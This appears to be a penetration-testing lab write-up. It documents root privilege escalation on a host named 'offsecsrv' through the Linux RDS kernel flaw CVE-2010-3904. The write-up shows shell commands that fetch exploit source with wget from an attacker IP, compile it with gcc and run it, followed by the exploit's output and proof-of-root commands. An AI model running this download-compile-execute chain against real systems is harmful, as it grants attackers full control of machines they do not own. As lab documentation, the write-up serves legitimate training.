ZenPhoto_Privilege_Escalation_2

CVE-2010-3904

---

PEAS has identified that the target system is vulnerable to CVE-2010-3904

A vulnerability classified as critical was found in Linux Kernel 2.6.16.9 (Operating System). This vulnerability affects the function rds_page_copy_user. The manipulation with an unknown input leads to a input validation vulnerability. The CWE definition for the vulnerability is CWE-1284. The product receives input that is expected to specify a quantity (such as size or length), but it does not validate or incorrectly validates that the quantity has the required properties. As an impact it is known to affect confidentiality, integrity, and availability.

Exploit

---

Exploit found online

Exploitation

---

www-data@offsecsrv:/var/tmp$ wget -q http://192.168.45.192/CVE-2010-3904.c
www-data@offsecsrv:/var/tmp$ gcc CVE-2010-3904.c -o CVE-2010-3904

Delivery complete & compiled the exploit

www-data@offsecsrv:/var/tmp$ ./CVE-2010-3904
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved rds_proto_ops to 0xf821f980
 [+] Resolved rds_ioctl to 0xf8219090
 [+] Resolved commit_creds to 0xc016dcc0
 [+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# whoami
whoami
root
# hostname
hostname
offsecsrv
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:50:56:9e:5f:f6 brd ff:ff:ff:ff:ff:ff
    inet 192.168.132.41/24 brd 192.168.132.255 scope global eth0
    inet6 fe80::250:56ff:fe9e:5ff6/64 scope link 
       valid_lft forever preferred_lft forever

System level compromise